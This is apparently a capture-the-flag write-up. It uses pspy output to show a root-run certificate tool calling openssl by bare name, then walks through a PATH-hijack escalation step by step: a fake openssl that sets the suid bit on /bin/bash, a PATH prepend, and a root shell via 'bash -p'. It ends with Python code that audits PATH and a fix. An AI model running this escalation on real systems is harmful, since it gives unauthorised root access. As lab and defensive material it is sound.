2021/06/25 02:46:00 CMD: UID=33   PID=11     | nginx: worker process  
2021/06/25 02:46:00 CMD: UID=33   PID=10     | nginx: worker process  
2021/06/25 02:46:00 CMD: UID=0    PID=1      | /bin/sh -c /entry.sh  
2021/06/25 02:46:03 CMD: UID=33   PID=1959   | /usr/bin/ersatool  
2021/06/25 02:46:35 CMD: UID=0    PID=1961   | sh -c /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1960   | /usr/bin/ersatool  
2021/06/25 02:46:35 CMD: UID=0    PID=1962   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1963   | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`ChangeMe`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf  
2021/06/25 02:46:35 CMD: UID=0    PID=1964   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1965   | openssl version  
2021/06/25 02:46:35 CMD: UID=0    PID=1966   | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf  
2021/06/25 02:46:35 CMD: UID=0    PID=1967   | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf  
2021/06/25 02:46:35 CMD: UID=0    PID=1968   | mktemp /opt/easyrsa/pki/private/a.key.XXXXXXXXXX  
2021/06/25 02:46:35 CMD: UID=0    PID=1969   | mktemp /opt/easyrsa/pki/reqs/a.req.XXXXXXXXXX  
2021/06/25 02:46:35 CMD: UID=0    PID=1970   | openssl req -utf8 -new -newkey rsa:2048 -config /opt/easyrsa/pki/safessl-easyrsa.cnf -keyout /opt/easyrsa/pki/private/a.key.HZbmrNjLDK -out /opt/easyrsa/pki/reqs/a.req.BOyXzgidnO -nodes -batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1971   |  
2021/06/25 02:46:35 CMD: UID=0    PID=1972   | mv /opt/easyrsa/pki/reqs/a.req.BOyXzgidnO /opt/easyrsa/pki/reqs/a.req  
2021/06/25 02:46:35 CMD: UID=0    PID=1973   | openssl rand -hex -out /opt/easyrsa/pki/serial 16  
2021/06/25 02:46:35 CMD: UID=0    PID=1974   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1975   | openssl ca -config /opt/easyrsa/pki/openssl-easyrsa.cnf -status 2243a379dfbe067da1fa206727f760b3  
2021/06/25 02:46:35 CMD: UID=0    PID=1976   | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`a`g -e s`$EASYRSA_REQ_EMAIL`me@example.net`g /opt/easyrsa/pki/openssl-easyrsa.cnf  
2021/06/25 02:46:35 CMD: UID=0    PID=1977   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1979   | openssl req -in /opt/easyrsa/pki/reqs/a.req -noout -subject -nameopt multiline  
2021/06/25 02:46:35 CMD: UID=0    PID=1978   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1980   | cat /opt/easyrsa/x509-types/COMMON  
2021/06/25 02:46:35 CMD: UID=0    PID=1983   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1984   | awk  
BEGIN {IGNORECASE=1; r=2}  
{       if(match($0,"no")) {r=1; exit}  
        if(match($0,"yes")) {r=0; exit}  
} END {exit r}  
2021/06/25 02:46:35 CMD: UID=0    PID=1985   | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1987   | openssl ca -utf8 -in /opt/easyrsa/pki/reqs/a.req -out /opt/easyrsa/pki/issued/a.crt.hgNfbGlQKY -config /opt/easyrsa/pki/safessl-easyrsa.cnf -extfile /opt/easyrsa/pki/extensions.temp -days 36500 -batch  
2021/06/25 02:46:35 CMD: UID=0    PID=1988   | mv /opt/easyrsa/pki/issued/a.crt.hgNfbGlQKY /opt/easyrsa/pki/issued/a.crt

Every time ersatool invokes openssl it does so as root (UID=0 on those lines of the pspy output), and it calls it by bare name ("openssl version", not /usr/bin/openssl), so the lookup follows PATH. A fake openssl placed in a directory that comes first in PATH therefore runs as root. This depends on ersatool passing its environment, PATH included, to the easyrsa child; the suid bit appearing on /bin/bash below confirms that it does. Use it to set the suid bit on /bin/bash, then /bin/bash -p keeps the effective uid and gives access to /root.

Create a file named openssl containing:

#!/bin/bash
chmod u+s /bin/bash

Base64 it on the attacking machine (easier than typing it into the shell):

┌─[ca4mi@ca4mi-virtualbox][~/Documents/htb/machine/static/www/cheat]
└──╼ $cat openssl | base64
IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=

Decode it inside pki:

echo "IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=" | base64 -d > openssl  

cat openssl  
#!/bin/bash  
chmod u+s /bin/bash  

Make it executable:

chmod 755 openssl

Create a directory (/tmp/pwn), put openssl in it and prepend it to PATH:

export PATH=/tmp/pwn:$PATH
echo $PATH  
/tmp/pwn:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Now run ersatool from this shell (create, then names a, b, c ...); each certificate build calls openssl through the PATH lookup, and afterwards /bin/bash carries the suid bit:

www-data@pki:/tmp/pwn$ ls -al /bin/bash  
-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash  
www-data@pki:/tmp/pwn$ /bin/bash -p  
bash-4.4# cd /root/  
bash-4.4# ls  
notes.txt root.txt
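What the pspy log shows is a root process calling openssl by bare name, so the lookup follows PATH. As an added example (not from these notes), a Python model of that lookup: resolve() does what execvp() does, hijackable_dirs() is the check a practitioner wants when auditing such a helper, listing the PATH entries the current user can write to that come before the real binary, and demo() builds a throwaway pwn/bin layout in a temporary directory. Nothing is executed; the planted file is a harmless stand-in for the chmod u+s script used above.

```python
import os
import shutil
import tempfile


def resolve(cmd: str, path_env: str):
    """What execvp() and a shell do with a bare name like 'openssl': walk PATH
    left to right and return the first executable regular file with that name."""
    for d in path_env.split(os.pathsep):
        cand = os.path.join(d or ".", cmd)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def hijackable_dirs(cmd: str, path_env: str):
    """PATH entries ahead of the directory holding the real cmd that the current
    user can write to. Any of them is where a fake cmd would win the lookup."""
    real = resolve(cmd, path_env)
    real_dir = os.path.dirname(real) if real else None
    risky = []
    for d in path_env.split(os.pathsep):
        d = d or "."
        if d == real_dir:
            break
        if os.path.isdir(d) and os.access(d, os.W_OK):
            risky.append(d)
    return risky


def plant(dirpath: str, cmd: str, body: str) -> str:
    """Drop an executable script called cmd into dirpath (the /tmp/pwn/openssl step)."""
    p = os.path.join(dirpath, cmd)
    with open(p, "w") as f:
        f.write(body)
    os.chmod(p, 0o755)
    return p


def demo():
    """Throwaway layout: PATH = <pwn>:<bin>, with the 'real' openssl in bin.
    Nothing is executed; the planted body is a harmless stand-in for the
    chmod u+s script used on the box. Returns what resolved before and after."""
    root = tempfile.mkdtemp()
    try:
        pwn, bin_ = os.path.join(root, "pwn"), os.path.join(root, "bin")
        os.mkdir(pwn)
        os.mkdir(bin_)
        real = plant(bin_, "openssl", "#!/bin/sh\necho real openssl\n")
        path_env = os.pathsep.join([pwn, bin_])
        before = resolve("openssl", path_env)          # the legitimate binary
        risky = hijackable_dirs("openssl", path_env)   # [pwn]: writable and first
        planted = plant(pwn, "openssl", "#!/bin/sh\necho hijacked\n")
        after = resolve("openssl", path_env)           # now the planted file
        return {"pwn": pwn, "bin": bin_, "real": real, "before": before,
                "risky": risky, "planted": planted, "after": after}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:8} {v}")
```

The fix on the tool's side is the mirror image of the check: call helpers by absolute path and hand the child a fixed PATH rather than the caller's, so that nothing the unprivileged user controls takes part in the lookup.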